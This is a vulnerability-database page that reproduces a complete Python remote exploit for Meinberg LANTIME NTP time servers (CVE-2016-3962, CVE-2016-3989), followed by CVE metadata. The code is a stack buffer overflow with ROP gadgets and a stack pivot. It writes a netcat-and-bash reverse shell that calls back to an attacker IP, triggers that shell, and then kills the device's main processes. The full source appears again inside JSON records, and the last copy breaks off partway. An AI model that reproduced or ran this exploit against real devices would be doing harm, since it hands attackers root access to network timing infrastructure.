Search...

Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution and Escalate Privileges

2016-07-17T00:00:00

ID EDB-ID:40120
Type exploitdb
Reporter b0yd
Modified 2016-07-17T00:00:00

Description

Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution and Escalate Privileges. CVE-2016-3962,CVE-2016-3989. Remote exploit for Hardware p...

                                        
                                            #!/usr/bin/python
#
# EDB Note: Source ~ https://github.com/securifera/CVE-2016-3962-Exploit
# EDB Note: More info ~ https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/
#
# 271 - trigger notifications
# 299 - copy user defined notifications

# Kernel Version: 2.6.15.1
# System Version: 530 
# Lantime configuration utility 1.27
# ELX800/GPS M4x V5.30p

import socket
import struct
import telnetlib
import sys
import time

if len(sys.argv) &lt; 3:
	print "[-] &lt;Host&gt; &lt;Callback IP&gt; "
	exit(1)

	
host = sys.argv[1]
callback_ip = sys.argv[2]

print "[+] exploiting Meinburg M400"
port = 80

###################################################################
#
# Copy user_defined_notification to /www/filetmp
# Append reverse shell string to /file/tmp	
#
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )

param = "A" * 0x2850

resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"

system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8

#must have a listener setup to receive the callback connection on ip 192.168.60.232
# i.e. nc -v -l -p 4444
command = 'cp /mnt/flash/config/user_defined_notification /www/filetmp; echo "{rm,/tmp/foo};{mkfifo,/tmp/foo};/bin/bash&lt;/tmp/foo|{nc,' + callback_ip +'0,4444}&gt;/tmp/foo;" &gt;&gt; /www/filetmp'

msg = "button=" + "A"*10028 
msg += struct.pack("I", system )
msg += struct.pack("I", exit )
msg += struct.pack("I", some_str )
msg += command + "\x00"

resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg
csock.send(resp)
csock.close()

time.sleep(1)

###################################################################
#
# Copy /www/filetmp to user_defined_notification	
# 
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )

param = "A" * 0x2850

resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"

send_cmd = 0x807ED88
system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8
ret = 0x804CE65

#stack pivot
stack_pivot = 0x8049488
msg = "button=" + "A" * 9756

msg += "B" * 28
msg += struct.pack("I", 0x7FFEE01A )       # ebp
msg += struct.pack("I", 0x0804ce64 )       # pop eax ; ret
msg += struct.pack("I", some_str - 0x100 ) # some place
msg += struct.pack("I", 0x080855cc )       # add dword ptr [eax + 0x60], ebp ; ret
msg += struct.pack("I", 0x080651d4 )       # inc dword ptr [ebx + 0x566808ec] ; ret
msg += struct.pack("I", ret ) * (71/4)

msg += struct.pack("I", send_cmd )
msg += struct.pack("I", exit )
msg += struct.pack("I", 0x80012111 )       # [eax + 0x60]
msg += struct.pack("I", some_str )         # buffer
msg += struct.pack("I", 0xffffffff )       # count
msg += "E" * 120

msg += struct.pack("I", 0xB1E8B434 )   # ebx
msg += struct.pack("I", some_str - 100 )   # esi
msg += struct.pack("I", some_str - 100 )   # edi
msg += struct.pack("I", some_str - 0x100 ) # ebp
msg += struct.pack("I", stack_pivot )      # mov esp, ebp ; ret
msg += "A" * 100

resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg
csock.send(resp)
csock.close

time.sleep(1)

###################################################################
#
# Trigger reverse shell	
# 
	
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )

param = "A" * 0x2850

resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"

send_cmd = 0x807ED88
system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8
ret = 0x804CE65

#stack pivot
stack_pivot = 0x8049488
msg = "button=" + "A" * 9756

msg += "B" * 28
msg += struct.pack("I", 0x7FFEE01A )       # ebp
msg += struct.pack("I", 0x0804ce64 )       # pop eax ; ret
msg += struct.pack("I", some_str - 0x100 ) # some place
msg += struct.pack("I", 0x080855cc )       # add dword ptr [eax + 0x60], ebp ; ret
msg += struct.pack("I", 0x080651d4 )       # inc dword ptr [ebx + 0x566808ec] ; ret
msg += struct.pack("I", ret ) * (71/4)

msg += struct.pack("I", send_cmd )
msg += struct.pack("I", exit )
msg += struct.pack("I", 0x800120f5 )       # [eax + 0x60]
msg += struct.pack("I", some_str )         # buffer
msg += struct.pack("I", 0xffffffff )       # count
msg += "E" * 120

msg += struct.pack("I", 0xB1E8B434 )   # ebx
msg += struct.pack("I", some_str - 100 )   # esi
msg += struct.pack("I", some_str - 100 )   # edi
msg += struct.pack("I", some_str - 0x100 ) # ebp
msg += struct.pack("I", stack_pivot )      # mov esp, ebp ; ret
msg += "A" * 100

resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg
csock.send(resp)
csock.close()

time.sleep(1)


print "[+] cleaning up"
###################################################################
#
# Kill all mains that are hung-up
#
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )

param = "A" * 0x2850

resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"

system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8

command = 'killall main'

msg = "button=" + "A"*10028 
msg += struct.pack("I", system )
msg += struct.pack("I", exit )
msg += struct.pack("I", some_str )
msg += command + "\x00"

resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg
csock.send(resp)
csock.close()

print "[+] enjoy"

JSON Vulners Source

Initial Source

{"id": "EDB-ID:40120", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution and Escalate Privileges", "description": "Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution and Escalate Privileges. CVE-2016-3962,CVE-2016-3989. Remote exploit for Hardware p...", "published": "2016-07-17T00:00:00", "modified": "2016-07-17T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:NONE/", "score": 8.5}, "href": "https://www.exploit-db.com/exploits/40120/", "reporter": "b0yd", "references": [], "cvelist": ["CVE-2016-3989", "CVE-2016-3962"], "lastseen": "2016-07-18T19:13:40", "viewCount": 27, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2016-07-18T19:13:40", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-3962", "CVE-2016-3989"]}, {"type": "zdt", "idList": ["1337DAY-ID-25437"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106110"]}, {"type": "ics", "idList": ["ICSA-16-175-03"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:D34BF86AC539AEBAEDB8B3FFCD3F9B4B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:137947"]}], "modified": "2016-07-18T19:13:40", "rev": 2}, "vulnersScore": 6.5}, "sourceHref": "https://www.exploit-db.com/download/40120/", "sourceData": "#!/usr/bin/python\r\n#\r\n# EDB Note: Source ~ https://github.com/securifera/CVE-2016-3962-Exploit\r\n# EDB Note: More info ~ https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/\r\n#\r\n# 271 - trigger notifications\r\n# 299 - copy user defined notifications\r\n\r\n# Kernel Version: 2.6.15.1\r\n# System Version: 530 \r\n# Lantime configuration utility 1.27\r\n# ELX800/GPS M4x V5.30p\r\n\r\nimport socket\r\nimport struct\r\nimport telnetlib\r\nimport sys\r\nimport time\r\n\r\nif len(sys.argv) < 3:\r\n\tprint \"[-] <Host> <Callback IP> \"\r\n\texit(1)\r\n\r\n\t\r\nhost = sys.argv[1]\r\ncallback_ip = sys.argv[2]\r\n\r\nprint \"[+] exploiting Meinburg M400\"\r\nport = 80\r\n\r\n###################################################################\r\n#\r\n# Copy user_defined_notification to /www/filetmp\r\n# Append reverse shell string to /file/tmp\t\r\n#\r\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ncsock.connect ( (host, int(port)) )\r\n\r\nparam = \"A\" * 0x2850\r\n\r\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\r\nresp += \"Host: \" + host + \"\\r\\n\"\r\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\r\nresp += \"Accept: text/html\\r\\n\"\r\nresp += \"Accept-Language: en-US\\r\\n\"\r\nresp += \"Connection: keep-alive\\r\\n\"\r\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n\r\nsystem = 0x80490B0\r\nexit = 0x80492C0\r\nsome_str = 0x850BDB8\r\n\r\n#must have a listener setup to receive the callback connection on ip 192.168.60.232\r\n# i.e. nc -v -l -p 4444\r\ncommand = 'cp /mnt/flash/config/user_defined_notification /www/filetmp; echo \"{rm,/tmp/foo};{mkfifo,/tmp/foo};/bin/bash</tmp/foo|{nc,' + callback_ip +'0,4444}>/tmp/foo;\" >> /www/filetmp'\r\n\r\nmsg = \"button=\" + \"A\"*10028 \r\nmsg += struct.pack(\"I\", system )\r\nmsg += struct.pack(\"I\", exit )\r\nmsg += struct.pack(\"I\", some_str )\r\nmsg += command + \"\\x00\"\r\n\r\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\r\nresp += msg\r\ncsock.send(resp)\r\ncsock.close()\r\n\r\ntime.sleep(1)\r\n\r\n###################################################################\r\n#\r\n# Copy /www/filetmp to user_defined_notification\t\r\n# \r\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ncsock.connect ( (host, int(port)) )\r\n\r\nparam = \"A\" * 0x2850\r\n\r\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\r\nresp += \"Host: \" + host + \"\\r\\n\"\r\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\r\nresp += \"Accept: text/html\\r\\n\"\r\nresp += \"Accept-Language: en-US\\r\\n\"\r\nresp += \"Connection: keep-alive\\r\\n\"\r\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n\r\nsend_cmd = 0x807ED88\r\nsystem = 0x80490B0\r\nexit = 0x80492C0\r\nsome_str = 0x850BDB8\r\nret = 0x804CE65\r\n\r\n#stack pivot\r\nstack_pivot = 0x8049488\r\nmsg = \"button=\" + \"A\" * 9756\r\n\r\nmsg += \"B\" * 28\r\nmsg += struct.pack(\"I\", 0x7FFEE01A ) # ebp\r\nmsg += struct.pack(\"I\", 0x0804ce64 ) # pop eax ; ret\r\nmsg += struct.pack(\"I\", some_str - 0x100 ) # some place\r\nmsg += struct.pack(\"I\", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret\r\nmsg += struct.pack(\"I\", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret\r\nmsg += struct.pack(\"I\", ret ) * (71/4)\r\n\r\nmsg += struct.pack(\"I\", send_cmd )\r\nmsg += struct.pack(\"I\", exit )\r\nmsg += struct.pack(\"I\", 0x80012111 ) # [eax + 0x60]\r\nmsg += struct.pack(\"I\", some_str ) # buffer\r\nmsg += struct.pack(\"I\", 0xffffffff ) # count\r\nmsg += \"E\" * 120\r\n\r\nmsg += struct.pack(\"I\", 0xB1E8B434 ) # ebx\r\nmsg += struct.pack(\"I\", some_str - 100 ) # esi\r\nmsg += struct.pack(\"I\", some_str - 100 ) # edi\r\nmsg += struct.pack(\"I\", some_str - 0x100 ) # ebp\r\nmsg += struct.pack(\"I\", stack_pivot ) # mov esp, ebp ; ret\r\nmsg += \"A\" * 100\r\n\r\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\r\nresp += msg\r\ncsock.send(resp)\r\ncsock.close\r\n\r\ntime.sleep(1)\r\n\r\n###################################################################\r\n#\r\n# Trigger reverse shell\t\r\n# \r\n\t\r\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ncsock.connect ( (host, int(port)) )\r\n\r\nparam = \"A\" * 0x2850\r\n\r\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\r\nresp += \"Host: \" + host + \"\\r\\n\"\r\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\r\nresp += \"Accept: text/html\\r\\n\"\r\nresp += \"Accept-Language: en-US\\r\\n\"\r\nresp += \"Connection: keep-alive\\r\\n\"\r\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n\r\nsend_cmd = 0x807ED88\r\nsystem = 0x80490B0\r\nexit = 0x80492C0\r\nsome_str = 0x850BDB8\r\nret = 0x804CE65\r\n\r\n#stack pivot\r\nstack_pivot = 0x8049488\r\nmsg = \"button=\" + \"A\" * 9756\r\n\r\nmsg += \"B\" * 28\r\nmsg += struct.pack(\"I\", 0x7FFEE01A ) # ebp\r\nmsg += struct.pack(\"I\", 0x0804ce64 ) # pop eax ; ret\r\nmsg += struct.pack(\"I\", some_str - 0x100 ) # some place\r\nmsg += struct.pack(\"I\", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret\r\nmsg += struct.pack(\"I\", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret\r\nmsg += struct.pack(\"I\", ret ) * (71/4)\r\n\r\nmsg += struct.pack(\"I\", send_cmd )\r\nmsg += struct.pack(\"I\", exit )\r\nmsg += struct.pack(\"I\", 0x800120f5 ) # [eax + 0x60]\r\nmsg += struct.pack(\"I\", some_str ) # buffer\r\nmsg += struct.pack(\"I\", 0xffffffff ) # count\r\nmsg += \"E\" * 120\r\n\r\nmsg += struct.pack(\"I\", 0xB1E8B434 ) # ebx\r\nmsg += struct.pack(\"I\", some_str - 100 ) # esi\r\nmsg += struct.pack(\"I\", some_str - 100 ) # edi\r\nmsg += struct.pack(\"I\", some_str - 0x100 ) # ebp\r\nmsg += struct.pack(\"I\", stack_pivot ) # mov esp, ebp ; ret\r\nmsg += \"A\" * 100\r\n\r\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\r\nresp += msg\r\ncsock.send(resp)\r\ncsock.close()\r\n\r\ntime.sleep(1)\r\n\r\n\r\nprint \"[+] cleaning up\"\r\n###################################################################\r\n#\r\n# Kill all mains that are hung-up\r\n#\r\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ncsock.connect ( (host, int(port)) )\r\n\r\nparam = \"A\" * 0x2850\r\n\r\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\r\nresp += \"Host: \" + host + \"\\r\\n\"\r\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\r\nresp += \"Accept: text/html\\r\\n\"\r\nresp += \"Accept-Language: en-US\\r\\n\"\r\nresp += \"Connection: keep-alive\\r\\n\"\r\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n\r\nsystem = 0x80490B0\r\nexit = 0x80492C0\r\nsome_str = 0x850BDB8\r\n\r\ncommand = 'killall main'\r\n\r\nmsg = \"button=\" + \"A\"*10028 \r\nmsg += struct.pack(\"I\", system )\r\nmsg += struct.pack(\"I\", exit )\r\nmsg += struct.pack(\"I\", some_str )\r\nmsg += command + \"\\x00\"\r\n\r\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\r\nresp += msg\r\ncsock.send(resp)\r\ncsock.close()\r\n\r\nprint \"[+] enjoy\"", "osvdbidlist": []}

{"cve": [{"lastseen": "2021-02-02T06:28:06", "description": "The NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote authenticated users to obtain root privileges for writing to unspecified scripts, and consequently obtain sensitive information or modify data, by leveraging access to the nobody account.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2016-07-03T14:59:00", "title": "CVE-2016-3989", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3989"], "modified": "2017-09-03T01:29:00", "cpe": ["cpe:/h:meinberg:lantime_m100:-", "cpe:/h:meinberg:lantime_m900:-", "cpe:/h:meinberg:lantime_m600:-", "cpe:/h:meinberg:syncfire_1100:-", "cpe:/h:meinberg:lantime_m200:-", "cpe:/h:meinberg:lantime_m300:-", "cpe:/o:meinberg:ntp_server_firmware:6.0", "cpe:/h:meinberg:ims-lantime_m1000:-", "cpe:/h:meinberg:lantime_m400:-", "cpe:/h:meinberg:lces:-", "cpe:/h:meinberg:ims-lantime_m500:-", "cpe:/h:meinberg:ims-lantime_m3000:-"], "id": "CVE-2016-3989", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3989", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:N"}, "cpe23": ["cpe:2.3:h:meinberg:lantime_m900:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:syncfire_1100:-:*:*:*:*:*:*:*", "cpe:2.3:o:meinberg:ntp_server_firmware:6.0:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:ims-lantime_m3000:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lantime_m300:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lantime_m200:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lantime_m100:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:ims-lantime_m500:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lantime_m400:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lantime_m600:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:ims-lantime_m1000:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lces:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:06", "description": "Stack-based buffer overflow in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 7.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.4}, "published": "2016-07-03T14:59:00", "title": "CVE-2016-3962", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3962"], "modified": "2017-09-03T01:29:00", "cpe": ["cpe:/h:meinberg:lantime_m100:-", "cpe:/h:meinberg:lantime_m900:-", "cpe:/h:meinberg:lantime_m600:-", "cpe:/h:meinberg:syncfire_1100:-", "cpe:/h:meinberg:lantime_m200:-", "cpe:/h:meinberg:lantime_m300:-", "cpe:/o:meinberg:ntp_server_firmware:6.0", "cpe:/h:meinberg:ims-lantime_m1000:-", "cpe:/h:meinberg:lantime_m400:-", "cpe:/h:meinberg:lces:-", "cpe:/h:meinberg:ims-lantime_m500:-", "cpe:/h:meinberg:ims-lantime_m3000:-"], "id": "CVE-2016-3962", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3962", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:h:meinberg:lantime_m900:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:syncfire_1100:-:*:*:*:*:*:*:*", "cpe:2.3:o:meinberg:ntp_server_firmware:6.0:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:ims-lantime_m3000:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lantime_m300:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lantime_m200:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lantime_m100:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:ims-lantime_m500:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lantime_m400:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lantime_m600:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:ims-lantime_m1000:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lces:-:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-04-08T14:26:17", "edition": 2, "description": "Exploit for hardware platform in category remote exploits", "published": "2016-07-17T00:00:00", "type": "zdt", "title": "Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution / Escalate Privileges", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3989", "CVE-2016-3962"], "modified": "2016-07-17T00:00:00", "id": "1337DAY-ID-25437", "href": "https://0day.today/exploit/description/25437", "sourceData": "#!/usr/bin/python\r\n#\r\n# EDB Note: Source ~ https://github.com/securifera/CVE-2016-3962-Exploit\r\n# EDB Note: More info ~ https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/\r\n#\r\n# 271 - trigger notifications\r\n# 299 - copy user defined notifications\r\n \r\n# Kernel Version: 2.6.15.1\r\n# System Version: 530 \r\n# Lantime configuration utility 1.27\r\n# ELX800/GPS M4x V5.30p\r\n \r\nimport socket\r\nimport struct\r\nimport telnetlib\r\nimport sys\r\nimport time\r\n \r\nif len(sys.argv) < 3:\r\n print \"[-] <Host> <Callback IP> \"\r\n exit(1)\r\n \r\n \r\nhost = sys.argv[1]\r\ncallback_ip = sys.argv[2]\r\n \r\nprint \"[+] exploiting Meinburg M400\"\r\nport = 80\r\n \r\n###################################################################\r\n#\r\n# Copy user_defined_notification to /www/filetmp\r\n# Append reverse shell string to /file/tmp \r\n#\r\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ncsock.connect ( (host, int(port)) )\r\n \r\nparam = \"A\" * 0x2850\r\n \r\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\r\nresp += \"Host: \" + host + \"\\r\\n\"\r\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\r\nresp += \"Accept: text/html\\r\\n\"\r\nresp += \"Accept-Language: en-US\\r\\n\"\r\nresp += \"Connection: keep-alive\\r\\n\"\r\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n \r\nsystem = 0x80490B0\r\nexit = 0x80492C0\r\nsome_str = 0x850BDB8\r\n \r\n#must have a listener setup to receive the callback connection on ip 192.168.60.232\r\n# i.e. nc -v -l -p 4444\r\ncommand = 'cp /mnt/flash/config/user_defined_notification /www/filetmp; echo \"{rm,/tmp/foo};{mkfifo,/tmp/foo};/bin/bash</tmp/foo|{nc,' + callback_ip +'0,4444}>/tmp/foo;\" >> /www/filetmp'\r\n \r\nmsg = \"button=\" + \"A\"*10028\r\nmsg += struct.pack(\"I\", system )\r\nmsg += struct.pack(\"I\", exit )\r\nmsg += struct.pack(\"I\", some_str )\r\nmsg += command + \"\\x00\"\r\n \r\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\r\nresp += msg\r\ncsock.send(resp)\r\ncsock.close()\r\n \r\ntime.sleep(1)\r\n \r\n###################################################################\r\n#\r\n# Copy /www/filetmp to user_defined_notification \r\n# \r\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ncsock.connect ( (host, int(port)) )\r\n \r\nparam = \"A\" * 0x2850\r\n \r\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\r\nresp += \"Host: \" + host + \"\\r\\n\"\r\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\r\nresp += \"Accept: text/html\\r\\n\"\r\nresp += \"Accept-Language: en-US\\r\\n\"\r\nresp += \"Connection: keep-alive\\r\\n\"\r\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n \r\nsend_cmd = 0x807ED88\r\nsystem = 0x80490B0\r\nexit = 0x80492C0\r\nsome_str = 0x850BDB8\r\nret = 0x804CE65\r\n \r\n#stack pivot\r\nstack_pivot = 0x8049488\r\nmsg = \"button=\" + \"A\" * 9756\r\n \r\nmsg += \"B\" * 28\r\nmsg += struct.pack(\"I\", 0x7FFEE01A ) # ebp\r\nmsg += struct.pack(\"I\", 0x0804ce64 ) # pop eax ; ret\r\nmsg += struct.pack(\"I\", some_str - 0x100 ) # some place\r\nmsg += struct.pack(\"I\", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret\r\nmsg += struct.pack(\"I\", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret\r\nmsg += struct.pack(\"I\", ret ) * (71/4)\r\n \r\nmsg += struct.pack(\"I\", send_cmd )\r\nmsg += struct.pack(\"I\", exit )\r\nmsg += struct.pack(\"I\", 0x80012111 ) # [eax + 0x60]\r\nmsg += struct.pack(\"I\", some_str ) # buffer\r\nmsg += struct.pack(\"I\", 0xffffffff ) # count\r\nmsg += \"E\" * 120\r\n \r\nmsg += struct.pack(\"I\", 0xB1E8B434 ) # ebx\r\nmsg += struct.pack(\"I\", some_str - 100 ) # esi\r\nmsg += struct.pack(\"I\", some_str - 100 ) # edi\r\nmsg += struct.pack(\"I\", some_str - 0x100 ) # ebp\r\nmsg += struct.pack(\"I\", stack_pivot ) # mov esp, ebp ; ret\r\nmsg += \"A\" * 100\r\n \r\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\r\nresp += msg\r\ncsock.send(resp)\r\ncsock.close\r\n \r\ntime.sleep(1)\r\n \r\n###################################################################\r\n#\r\n# Trigger reverse shell \r\n# \r\n \r\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ncsock.connect ( (host, int(port)) )\r\n \r\nparam = \"A\" * 0x2850\r\n \r\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\r\nresp += \"Host: \" + host + \"\\r\\n\"\r\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\r\nresp += \"Accept: text/html\\r\\n\"\r\nresp += \"Accept-Language: en-US\\r\\n\"\r\nresp += \"Connection: keep-alive\\r\\n\"\r\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n \r\nsend_cmd = 0x807ED88\r\nsystem = 0x80490B0\r\nexit = 0x80492C0\r\nsome_str = 0x850BDB8\r\nret = 0x804CE65\r\n \r\n#stack pivot\r\nstack_pivot = 0x8049488\r\nmsg = \"button=\" + \"A\" * 9756\r\n \r\nmsg += \"B\" * 28\r\nmsg += struct.pack(\"I\", 0x7FFEE01A ) # ebp\r\nmsg += struct.pack(\"I\", 0x0804ce64 ) # pop eax ; ret\r\nmsg += struct.pack(\"I\", some_str - 0x100 ) # some place\r\nmsg += struct.pack(\"I\", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret\r\nmsg += struct.pack(\"I\", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret\r\nmsg += 